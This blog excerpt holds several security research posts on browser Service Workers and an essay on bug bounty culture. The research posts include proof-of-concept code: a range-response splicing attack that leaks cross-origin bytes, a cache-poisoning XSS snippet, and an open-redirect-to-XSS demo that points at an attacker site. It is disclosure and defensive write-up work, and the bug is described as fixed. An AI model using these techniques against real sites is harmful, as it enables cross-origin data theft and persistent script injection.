Sunday, October 04, 2015

Range Responses: Mix, Match & Leak

Hey!

The videos from AppSec 2015 are now online, including the Service Workers talk. Anyway, this post is about another slide in that presentation, the one about Range Requests / Responses (more commonly known as Byte Serving) and Service Workers.

As things go, it turns out you can read content cross-domain with this attack, and this post explains how that works. Range Responses are essentially normal HTTP responses that contain only a subset of the body. It works like this:
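Roughly, the exchange looks like this (a hand-written sketch of a client asking for bytes 100-200 of a 1,000-byte file, not a real capture):

  GET /movie.webm HTTP/1.1
  Range: bytes=100-200

  HTTP/1.1 206 Partial Content
  Content-Range: bytes 100-200/1000
  Content-Length: 101

  <bytes 100 through 200 of the file>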

It's relatively straightforward! With service workers in the mix, you can do similar things:

What happens there is that the Service Worker intercepts the first request and gives you LoL instead of Foo. Note that this works cross-origin, since Service Workers apply to the page that created the request (so, say, if evil.com embeds a video from apple.com, the service worker from evil.com will be able to intercept the request to apple.com). One thing to note is that the Service Worker actually controls the total length of the response: even if the actual response is 2MB, if the Service Worker says it's 100KB, the browser will believe the Service Worker (browsers seem to respect the first response size they see, in this case the one from the service worker).
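In code, the interception looks something like this (a sketch with a hypothetical URL, not the exact code from the talk):

  // sw.js (sketch): intercept the page's first request and answer it ourselves.
  self.addEventListener('fetch', function(e) {
    // evil.com's worker sees requests made by evil.com's pages, even when
    // the destination is another origin (e.g. a video hosted on apple.com).
    if (e.request.url == 'https://apple.com/movie.webm') {  // hypothetical URL
      e.respondWith(new Response('LoL'));  // the real body would say 'Foo'
    }
    // Requests we don't respond to go to the network as usual.
  });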

This all started when I noticed that you could split a response in two: one part generated by a Service Worker, and one that isn't. To clarify, the code below intercepts a request for a song. What's interesting about it is that it serves part of the response (the first 3 bytes) from the Service Worker.

Another interesting aspect is that the size of the file is truncated to 5,000 bytes, because the browser remembers the first length it was given.

The code for this (before the bug was patched by Chrome) was:
  // Basic truncation example (this runs inside the service worker's fetch handler).
  if (url.pathname == '/wikipedia/ru/c/c6/Glorious.ogg') {
    if (e.request.headers.get('range') == 'bytes=0-') {
      console.log('responding with fake response');
      // Serve the three bytes 'Ogg' and claim the full file is 5,000 bytes.
      // Content-Range offsets are inclusive, so three bytes are 0-2.
      e.respondWith(
        new Response(
          'Ogg', {status: 206, headers: {'content-range': 'bytes 0-2/5000'}}))
    } else {
      console.log('ignoring request');
    }
    return;
  }
So, to reiterate, the Service Worker responds with "Ogg" as the first three bytes, and truncates the response to 5,000 bytes. Alright, so what can you do with this? Essentially, you can partially control audio/video responses, but it's unlikely this can cause a lot of problems, right? I mean, so what if you can make a bad song last 1 second rather than 30 seconds?

To exploit this we need to take a step back and see the data as the video decoder sees it. In essence, the video decoder doesn't actually know anything about range responses; it just sees a stream of bytes. Imagine the video the decoder sees had the following format:

  • [Bytes 0-100] Video Header
  • [Bytes 101-200] Video Frame
  • [Bytes 201-202] Checksum of Video Frame
Now imagine that the header and the video frame come from the Service Worker, while the checksum at the end comes from the target/victim site. A clever attacker could then try all 65,536 possible video frames until one of them doesn't error out, at which point we would know the value of bytes 201 and 202 of the target/victim site (see the sketch below).
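With that hypothetical format, the brute force would look something like this (a sketch; makeVideo and playsWithoutError are made-up helpers):

  // Sketch: brute-force the two victim bytes. makeVideo(i) builds a header
  // plus a frame whose valid checksum would be i; the decoder stitches the
  // real checksum bytes in from the victim via the second range request.
  async function bruteForceVictimBytes() {
    for (let i = 0; i < 0x10000; i++) {
      if (await playsWithoutError(makeVideo(i))) {
        return i;  // decoder accepted the video, so the victim's bytes equal i
      }
    }
  }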

I searched for a while for a video format or container with this property, but unfortunately didn't find one. To be honest, I didn't look too hard, as these specs are really confusing to read; after about an hour of searching and scratching my head I gave up, and decided to do some fuzzing instead.

The fuzzing was essentially like this:
  1. Get a sample of video and audio files.
  2. Load them in audio/video tags.
  3. Listen to all events.
  4. Fetch the video from bytes 0 to X, and claim a total length of X+1.
  5. Have the last byte be 0xFF.
  6. Repeat
Whenever the events differ between the response truncated at X and the one truncated at X+1, there's an info leak! I did this, and in a few hours, after wasting my time looking at MP3 files (it seems they just give out approximate durations at random), I found a candidate. Turns out it wasn't a checksum; it was something even better! :)
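The harness looked more or less like this (a reconstructed sketch, not the original script):

  // Sketch of the fuzzing loop. The service worker (not shown) answers
  // 'bytes=0-' with the first 'truncate' bytes of the sample, claims a total
  // of truncate+1, and makes the last byte 0xFF.
  function probe(url, truncate) {
    return new Promise(function(resolve) {
      var events = [];
      var video = document.createElement('video');
      ['loadedmetadata', 'durationchange', 'canplay', 'encrypted', 'error']
          .forEach(function(name) {
            video.addEventListener(name, function() { events.push(name); });
          });
      video.src = url + '?truncate=' + truncate;  // hypothetical SW signal
      setTimeout(function() { resolve(events.join(',')); }, 2000);
    });
  }

  // Any X where these two differ is an info leak candidate:
  // Promise.all([probe(url, x), probe(url, x + 1)]).then(...)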

So, I found that a specific Encrypted WebM video errors out when truncated to 306 bytes if the last byte is greater than 0x29, but triggers an onencrypted event when it's less than that. This seems super weird, but it's a good start, I guess. I created a proof of concept that tests whether a given byte in a cross-origin resource is less than 0x29 or not. If you have a vulnerable browser (Chrome <=44) you can see the proof of concept here:
If you compare both pages you will see that one says PASS and the other says FAIL. The reason is that at position 306 of www.bing.com's robots.txt there is a newline, while at position 306 of www.yahoo.com's there is a letter.
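The mechanics behind the PoC are roughly these (a sketch, not the exact PoC code; craftedWebmPrefix stands for the 305 attacker-controlled bytes):

  // sw.js (sketch): serve a crafted WebM prefix for the first range request
  // and let the second one hit the real cross-origin server.
  self.addEventListener('fetch', function(e) {
    if (e.request.url == 'https://www.bing.com/robots.txt') {
      if (e.request.headers.get('range') == 'bytes=0-') {
        // 305 bytes of crafted encrypted WebM, claiming a total of 306.
        e.respondWith(new Response(craftedWebmPrefix, {
          status: 206,
          headers: {'content-range': 'bytes 0-304/306'}
        }));
      }
      // The browser then requests 'bytes=305-'; we don't call respondWith,
      // so it goes to bing.com, and position 306 of robots.txt becomes the
      // last byte the decoder sees.
    }
  });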

Good enough, you might think! I can now know whether position 306 is a space or not. Not really that serious, but serious enough to be cool, right? No. Of course not.

First of all, I wanted to make this apply to any offset, not just 306. That was easy enough: you just create another EBML object of arbitrary size and keep making it longer. First problem solved; now you can choose the byte offset you are testing.

But still, the only thing I can learn is whether the character at that position is a space or not. So I started looking into why the video errored out, and it turns out it was because the dimensions of the video were too big. There is a limit on the pixel size of a video (for whatever reason), and the byte at position 306 happened to land in the video's height, making it larger than what is valid.

So, well.. now that we know that, can we learn the exact value? What if we tried to load the video 256 times, each time with a different width value, so that the dimension check overflows exactly when the secret byte is big enough? The formula the video decoder was using for calculating the maximum dimensions boiled down to, roughly:

  width * height >= INT_MAX / 8  // if this holds, the decoder errors out

So! Seems easy enough then. I get the minimum width on which it errors out and calculate its complement to INT_MAX/8 (minus 128), and that's the value of the byte at that position. Since this is a "less than" comparison, you can find this minimum value with a simple binary search.
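The search is then just a few lines (a sketch; testWidth is a made-up helper that loads the crafted video with the given width and reports whether the decoder errored out):

  // Find the smallest width that makes the decoder error out.
  async function findMinErrorWidth() {
    let lo = 1, hi = 65535;
    while (lo < hi) {
      const mid = (lo + hi) >> 1;
      if (await testWidth(mid)) {
        hi = mid;      // mid errors out: the minimum is mid or smaller
      } else {
        lo = mid + 1;  // mid plays fine: the minimum is larger than mid
      }
    }
    return lo;  // plug into the formula above to recover the byte
  }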

And that's it. I made a slightly nicer exploit here, although the code is quite unreadable. The PoC will try to steal www.bing.com's robots.txt byte by byte.

Severity-wise, fortunately, this isn't an end-of-the-world situation. Range Responses (or.. Byte Serving) don't actually work on any of the dynamically generated content I found online. This is most likely because dynamic content changes between requests, so serving it in chunks doesn't make sense.

And that's it for today! It's worth noting that this possibly isn't specific to Service Workers: HTTP redirects seem to have a similar effect (you make two requests to a same-origin video; the first time you respond with a truncated video, the second time you redirect to another domain). That variant matters especially since Service Workers aren't widely supported yet. Feel free to write a PoC for it (you can use this one for inspiration). And once the bug is public, you can follow along with the bug discovery here and the spec discussion here.

The bug is fixed in Chrome, but I didn't test other browsers as thoroughly for lack of time (and this blog post is already delayed by like 3 months because of Chrome, so I didn't want to embargo this further). If you do find a way to exploit this elsewhere, please let me know the results; I'm happy to help if you get stuck.

Have a nice day!

Tuesday, September 22, 2015

Not about the money

This applies to all posts in this blog, but just as a reminder: what I say here doesn't necessarily reflect the opinions of my employer. This is just my personal view on the subject.

I want to briefly discuss bug bounties, security rewards, and security research in general, mostly because a lot has changed in the last five years: there are many new players, some giving rewards and some receiving them.

Background

As a brief introduction, I'll preface this by explaining why I (personally) used to (and continue to) report bugs back when there was no money involved, and then try to go from there to where we are today.

Before there were bug bounties, I (and many others) used to report bugs for free to companies, and we usually got "credit" as the highest reward, but I actually didn't do it for the credit (it was a nice prize, but that's it).

The reason I did it was that I am a user, and I (selfishly) tried to make the products I used better and safer for me. Another reason was the challenge: finding bugs in "big" companies was like solving an unsolvable puzzle, like the last level of a wargame that the developers thought no one could solve.

Rewards

With that said, I was super excited when companies started paying for bugs: mostly because I had no money, but also because it felt "right". Money is easy for companies to give, and it is a good way to materialize appreciation.

Rewards are a great way to say "thank you for your time and effort". It's like a gift that just happens to come in US Dollars. Before money, T-Shirts were the equivalent, and sometimes even handwritten notes that said thank you.

It goes without saying that respect was also a big factor for me. Speedy responses, a human touch, and honest feedback always mattered a lot to me, and gave me confidence back when I was starting, especially when I learnt something new.

Appreciation

It is my view that we shouldn't call them "Bug Bounty Programs"; I would like them to be called "Bug Hunter Appreciation Programs". I don't like the term "Bug Bounty" because "bounty" sounds a lot like money up for grabs, when the attitude should be that of a gift, or a "thank you, you are awesome".

In other words, rewards are gifts, not transactions.

Rewards, in my view, are supposed to show appreciation, and they are not meant to be a price tag. There are many ways to show appreciation, and they can go from a simple "thank you!" in an email or in public, all the way to a job offer or a contract. In fact, I got my first job this way.

For companies, I actually think the main value reward programs provide isn't the "potential cyber-intelligence capabilities of continuous pentesting" or anything ridiculous like that, but something a lot simpler: building and maintaining a community around you, and you do that by building relationships.

Users

Think about it this way. These bug hunters are also users of the products they find bugs in, and these users then go and make those products better for everyone else. In return, the companies "thank" these users for helping make the product better not just for themselves, but for everyone.

These users also, eventually, become more familiar with these products than the developers themselves, and that is without even having access to the source code. These users will know about all the quirks of the product, and will know how to use them to their advantage. These are not power users; they are a super-powered version of a user.

And reward programs were built for these users, for those who were doing this back when money wasn't involved. They are there as a sign of appreciation and a way to recognize the value of the research.

Recognition

The traditional way of saying "thanks" for vulnerability research has been recognition. For recognition to be valuable it doesn't necessarily have to come from the affected product or company, but rather it could come from the press, or from others in the community. Having your bug be highlighted as a Pwnie is nice, for example, even more so than a security bulletin by the affected company.

More recently, it's become common for money to supplement recognition (and some companies apparently also use it to replace recognition, requiring the researcher not to talk about the bug, or not to talk badly about the affected company). It's interesting that this isn't usually highlighted, but I think it's quite important. For many of us, recognition matters more than money: we depend so much on working with and learning from others that silence diminishes the value of our work.

Money

One question that I don't see asked often enough is: How to decide reward amounts?

First of all, let's consider that they are gifts, not price tags. If you could come up with a gift that feels adequate for a user who is going out of their way to make (your) product better for everyone, what would it be?

It might very well be that it isn't money! Maybe it is free licenses for your product, or invitations to parties or conferences. Maybe it's just an invite to an unreleased product. Doing this at scale, though, might prove difficult.. so if you have to use money, maybe start with what it costs to go out one night for dinner and a movie, and go from there to calculate higher rewards.

This is one of the reasons I don't really like "micro rewards" of $10 USD or so: while they are well-intentioned, they also convey the wrong message. I do realize they are valuable in bulk (products that give out these micro rewards usually have a lot of low-hanging fruit), but rewarding individual bugs so low also gives the feeling you are just being used for crowdsourcing, or as a "Bulk Bounty".

In any case, I appreciate that this is mostly about how the message is wrapped, but I think the wrapping matters when you are dealing with money. The difference between being "the user" and being "the product" changes the perception and the relationship between companies and users.

Trust

Two of the most important aspects of any relationship are trust and respect. Coming back to the earlier point about money, I really like to see how different companies write their "no reward" responses, because they show how much the program feels like a transaction, and how much it feels like appreciation.

Maybe counter-intuitively for some, trust goes both ways: trusting bug hunters makes response teams more trustworthy, and vice-versa. That means accepting the possibility that you made a mistake when reporting a bug (even if it seems valid, maybe you are wrong!), and the other way around when handling one (even if it seems invalid, maybe it is valid!). This is particularly important when communicating disagreements.

In any case, whatever the decision was, just saying "thanks" goes a long way. Even the slightest hint of disrespect can ruin an otherwise strong relationship, especially in a medium as cold as email. What is even better is to be transparent about the rationale for the "no reward" response. This is difficult, logistically, as "no reward" decisions are the bulk of the responses sent by any program, but doing a good job here goes a long way to foster trust.

Help

At the end of the day, a vulnerability report is simply an attempt at helping the product. Such help is sometimes not welcome ("the best bug is the unknown bug") and sometimes it's not helpful at all (invalid reports, for example), but in any case, it's help. Accepting help when you need it, saying thanks when you don't, and then helping back when you can is essentially teamwork.

Another aspect is that sometimes you can reciprocate a vulnerability report with help. If a bug hunter seems lost or started off on the wrong foot, a little nudging and education can go a very long way. In fact, this is one of the most amazing realizations I've had in these past 4 years: the most insistent researchers, those who send the most reports, are also the most enthusiastic and eager to learn.

Investing some time in coaching and education, rather than just depending on automated advice or scores and rankings, helps create and grow a community. These bug hunters want to help; why don't you help them? It takes time and patience, but it will be worth it. A small amount of personal feedback is all that is needed. You can't automate relationships.

Challenges

Finally, something amazing happened. Some Bug Hunters started getting a reasonable amount of money out of this! While these programs were originally created to be more like winning the lottery, some very talented individuals actually became really good at this.

The consequences are actually quite interesting. If you can make a sustainable living off white-hat vulnerability research, you also become more dependent on these relationships than ever, and trust becomes critical to sustaining them in the long term. Transparency, clarity, and consistency in decisions suddenly become not just best practices but guiding principles.

Another interesting challenge is long-term planning. Finding bugs every day might make you more efficient at it, but companies ultimately want to make these bugs harder and harder to find. This creates some uncertainty about your future, and about how to sustain this for a long time.

Then there are other challenges. These programs are quite unique, and explaining their legal and fiscal implications can be challenging. I still remember when I got my first reward from Mozilla: it was a bit awkward explaining to my bank why I was receiving money from abroad. I can just imagine having to do that every couple of weeks; it would be crazy.

Conclusions

It's not about the money. It is about working together and keeping us all safe.
  • If you feel your reward wasn't as high as you expected, maybe your bug's impact wasn't understood correctly, and that also might mean it was fixed incorrectly. Make sure there are no misunderstandings.
  • If there are no misunderstandings, then take the reward as what it is - a gift. It's not a bill for your time, it's not a price for your silence, it's not a bid for your bug's market price. It's just a thank you.
  • If you don't get credit for the bug you found, but you think it is a cool bug, then get credit for yourself! Blog about it, and share it with your peers. Make sure the bug is fixed (or at least give a heads up before making it public, if it's not gonna be fixed quickly).
  • Bug hunters are also users. Delight them with excellent customer service. Money is just a way to say thank you; it isn't an excuse to have them do work.
  • Appreciation, Recognition and Transparency (ART) are the pillars of a well-run security response program.
  • If you find yourself buried in low-quality reports, invest some time to help the reporters improve. Ignoring the problem won't make it go away.
  • Invest as much time as possible knowing about your community. Meet them face to face, invite them for dinner! Bug hunters are and will always be your most valuable users (including those that just started learning).


Wednesday, May 27, 2015

[Service Workers] Secure Open Redirect becomes XSS Demo

This is the shortest delay between blog posts I've had in a while, but I figured that since my last post had some confusing stuff, it might make sense to add a short demo. The demo application has three things that enable the attack:

  1. An open redirect. Available at /cgi-bin/redirect?continue=.
  2. A Cache Service Worker. Available at /sw.js.
  3. A page that embeds images via <img crossorigin="anonymous" src="" />.
And the attacker's site has one thing:
  1. A CORS enabled attack page. Available at /cgi-bin/attack.
Let's do the attack then! For it to work we need two things to happen:
  • The service worker must be installed.
  • A request to our attack page must be cached with mode=cors.
Our index.html page will do both of those things for us.
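Concretely, index.html does something like this (a sketch; attacker.example is a placeholder for the attacker's domain):

  // index.html (sketch)
  navigator.serviceWorker.register('/sw.js').then(function() {
    // An <img crossorigin="anonymous"> forces a CORS-mode request. The open
    // redirect bounces it to the attacker's CORS-enabled page, and the cache
    // service worker stores that response under the same-origin URL.
    var img = document.createElement('img');
    img.crossOrigin = 'anonymous';
    img.src = '/cgi-bin/redirect?continue=' +
        encodeURIComponent('https://attacker.example/cgi-bin/attack');
    document.body.appendChild(img);
  });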
[Demo form: "Poison Cache", with an "Image URL" field and a submit button.]
When you click submit above the following things will happen:
  1. A service worker will be installed for the whole origin.
  2. An image tag pointing to the open redirect will be created.
  3. The service worker will cache the request with the CORS response of the attacker.
If all went well, the page above should be "poisoned", and you will get the XSS payload forever (or until the SW updates its cache). Try it (note that you must have "poisoned" the response above first; if you click the button below before poisoning the cache, you will ruin the demo forever, since an opaque response will get cached ;):
If the demo doesn't work for you, that probably means you navigated to the attack page before caching the CORS response. If that's the case, you will have to clear the cache and start over.

Note you need Chrome 43 or later for this to work (or a nightly version of Firefox with the flags flipped). Hope this clarifies things a bit!

Monday, May 25, 2015

[Service Workers] New APIs = New Vulns = Fun++


Just came back from another great HackPra Allstars, this time in the beautiful city of Amsterdam. Mario was kind enough to invite me to ramble about random security stuff I had in mind (and this year it was Service Workers). The presentation went OK and it was super fun to meet up with so many people, and watch all those great presentations.

In any case, I promised to write a blog post repeating the presentation in written form. However, I was hoping to watch the video first, to catch and correct any mistakes I might have made, and the video is not online yet. So, until then, this post is about something that wasn't mentioned in the talk.

This is about the types of vulnerabilities that applications using Service Workers are likely to create. To start, I just want to say that I totally love Service Workers! Their APIs are easy to use and understand, and the debugging tools in Chrome are beautiful and well done (very important, since tools such as Burp or TamperChrome don't work as well with offline apps, as no requests are actually made). You can clearly see that a lot of people have thought a lot about this problem, and there is some serious effort around making offline application development possible.

The reason this content wasn't part of the presentation is that I thought the talk already had too much, but if you don't know how Service Workers work, you might want to see the first section of the slides (it's an introduction), or read this article or watch this video.

Anyway, back to biz.. Given that there aren't many "real" web applications using Service Workers yet, I'll be using the service-worker samples from w3c-webmob; as soon as you start finding real service worker usage, take a look and let me know if you find these problems too!

There are two main categories of potential problems I can see:
  1. Response and Caching Issues
  2. Web JavaScript Web Development

Response and Caching Issues

The first "category" or "family" of problems are response and caching issues. These are issues that are present because of the way responses are likely to be handled by applications.

Forever XSS

The first problem, which is probably kind-of bad, is the possibility of turning a reflected XSS into a persistent XSS. We've already seen this type of problem with APIs like localStorage before, but what makes this different is that the Cache API is actually designed to do exactly that!

When the site is about to request a page from the web, the service worker is consulted first. At this point the service worker can decide to respond with a cached response (the logic is totally delegated to the Service Worker). One of the main use cases for service workers is to serve a cached copy of the request. This cache is programmatic, and it's totally up to the application to decide how to handle it.

One coding pattern for Service Workers is to respond with whatever is in the cache if available, or to make a request if not (and cache the response). In other words, no request is ever made to the server if the request matches a cached response. Since this Cache database is accessible to any JS code running in the same origin, an attacker can pollute the Cache with whatever it wants, and let the client serve the malicious XSS forever!
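The pattern looks something like this (a sketch of the read-through-caching idiom; the cache name matches the demo below):

  self.addEventListener('fetch', function(e) {
    e.respondWith(caches.open('prefetch-cache-v1').then(function(cache) {
      return cache.match(e.request).then(function(cached) {
        if (cached) return cached;  // never touches the network again
        return fetch(e.request).then(function(response) {
          cache.put(e.request, response.clone());  // cache whatever came back
          return response;
        });
      });
    }));
  });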

If you want to try this out, go here:

Then fake an XSS by typing this to the console:
  caches.open('prefetch-cache-v1').then(function(cache) {
    cache.put(
        new Request('index.html', {mode: 'no-cors'}),
        new Response('\x3cscript>alert(1)\x3c/script>',
                     {headers: {'content-type': 'text/html'}}));
  });

Now whenever you visit that page you will see an alert instead! You can use Control+Shift+R to undo it, but when you visit the page again, the XSS will come back. It's actually quite difficult to get rid of this XSS. You have to manually delete the cache :(.

This is likely to be an anti-pattern we'll often see in new Service-Worker-enabled applications. To prevent it, one of the ideas from Jake Archibald is to simply check the "url" property of the response: if the URL is not the same as the request's, then don't use the response, and discard it from the cache. This idea is actually quite important, and I'll explain why below.
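The check itself is small. Something like this (a sketch, not Jake's exact code):

  self.addEventListener('fetch', function(e) {
    e.respondWith(caches.open('prefetch-cache-v1').then(function(cache) {
      return cache.match(e.request).then(function(response) {
        // A redirect (or an attacker) can leave a response whose final URL
        // differs from the request's; don't serve it, and drop it.
        if (response && response.url && response.url != e.request.url) {
          cache.delete(e.request);
          response = null;
        }
        return response || fetch(e.request);
      });
    }));
  });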

When Secure Open Redirects become XSS

A couple years ago in a presentation with thornmaker we explained how open redirects can result in XSS and information leaks, and they were mostly limited to things such as redirecting to insecure protocols (like javascript: or data:). Service Workers, however, and in specific some of the ways that the Cache API is likely to be used, introduce yet another possibility, and one that is quite bad too.

As explained before, the way people seem to be coding against the Cache API is by reading the Request, fetching it, and then caching the Response. This is tricky, because when a service worker renders a response, it renders it as coming from the same origin it was requested from.

In other words.. let's say you have a website that has an open redirect..
  • https://www.example.com/logout?next=https://www.othersite.com/
And you have a service worker like this one:
  • https://googlechrome.github.io/samples/service-worker/read-through-caching/service-worker.js
What that service worker does, like the previous one, is simply cache all requests that go through by fetching and storing them. But fetch() transparently follows redirects, so when the page requests the open redirect URL, the service worker ends up caching the response from evilwebsite.com under the same-origin request!

That means that next time the user goes to:
  • https://www.example.com/logout?next=https://www.evilwebsite.com
The request will be cached and instead of getting a 302 redirect, they will get the contents of evilwebsite.com.

Note that for this to work, evilwebsite.com must include Access-Control-Allow-Origin: * as a response header, as otherwise the request won't be accepted. And you need to make the request CORS-enabled (with a crossorigin image or embed request, for example).

This means that an open redirect can be converted into a persistent XSS, and it's another reason why checking the url property of the Response before rendering it is so important (both for responses from the Cache and for code like event.respondWith(fetch(event.request))). Even if you have never had an XSS, you can introduce one by accident. If I had to guess, almost all usages of Service Workers that don't implement the response.url check will be vulnerable to one variation or another of these attacks.

There are a bunch of other interesting things you can do with Service Workers and Requests / Responses, mentioned in the talk, that I'll try to blog about later. For now, though, let's change the subject.

Web JavaScript Web Development

This will sound weird to some, but the JavaScript APIs in the browser don't actually include any good APIs for building web responses. What this means is that Service Workers will now be kind-of like web servers, but without any APIs for secure web development, so it's likely they will introduce a bunch of cool bugs.

JavaScript Web APIs aren't Web Service APIs


For starters, the default concerns are things that already affect JS-based server applications (like Node.js): everything from RegExp bugs (because the JS APIs aren't secure by default) to the JSON API's lack of output encoding.

But another, more interesting problem is the lack of templating APIs in Service Workers: people will write code like this, which of course means it's gonna be full of XSS. And while you could import a templating library with strict contextual auto-escaping, the lack of a default means people are likely to use insecure alternatives or just fall back to string concatenation (note that things like Angular and Handlebars won't work here, because they work at the DOM level, and Service Workers don't have access to the DOM as they run way before the DOM is created).
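As a strawman, consider a worker that builds HTML by string concatenation (a made-up but representative example):

  // Anti-pattern sketch (hypothetical endpoint): anything in 'q' lands in
  // the page unescaped, so this is XSS by construction.
  self.addEventListener('fetch', function(e) {
    var url = new URL(e.request.url);
    if (url.pathname == '/search') {
      var q = url.searchParams.get('q') || '';
      e.respondWith(new Response(
          '<h1>Results for ' + q + '</h1>',  // string concatenation, no escaping
          {headers: {'content-type': 'text/html'}}));
    }
  });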

It's also worth noting that the asynchronous nature of Service Workers (event-driven and promise-based), mixed with developers who aren't used to it, is extremely likely to introduce concurrency vulnerabilities in JS if people abuse the global scope; while that isn't the case today, it's very likely to be soon.

Cross Site Request Forgery


Another concern is that CSRF protection will have to behave differently for Service Workers. Specifically, Service Workers will most likely have to depend more on referrer/origin-based checks. This isn't bad in and of itself, but mixing it with online web applications will most likely pose a challenge. Funnily, none of the demos I found online have CSRF protection, which underlines the problem, but also makes it hard for me to give you examples of why it's gonna be hard.

To give a specific example: if a web application is meant to work while offline, how would such an application keep track of CSRF tokens? Once the user comes back online, it's possible the CSRF tokens won't be valid anymore, and the offline application will have to handle that gracefully. While handling the fallback correctly is possible by doing different checks depending on the online state of the application, it's likely more people will get it wrong than right.
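One way to handle it gracefully might look like this (just a sketch of the idea; the /csrf-token endpoint is made up):

  // Queue state-changing requests while offline; when connectivity comes
  // back, fetch a fresh token before replaying them.
  function replayQueued(queue) {
    return fetch('/csrf-token', {credentials: 'include'})
        .then(function(r) { return r.text(); })
        .then(function(token) {
          return Promise.all(queue.map(function(q) {
            return fetch(q.url, {
              method: 'POST',
              headers: {'x-csrf-token': token},
              body: q.body,
              credentials: 'include'
            });
          }));
        });
  }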

Conclusion

I'm really excited to see what types of web applications get developed with Service Workers, and also what types of vulnerabilities they introduce :). It's too early to know exactly, but some anti-patterns are clearly starting to emerge, either as a result of the API design or of the existing mental models in developers' heads.

Another thing I wanted to mention before closing up: I'll start experimenting with writing some of the defensive security tools I mentioned in the talk; if you want to help out as well, please let me know!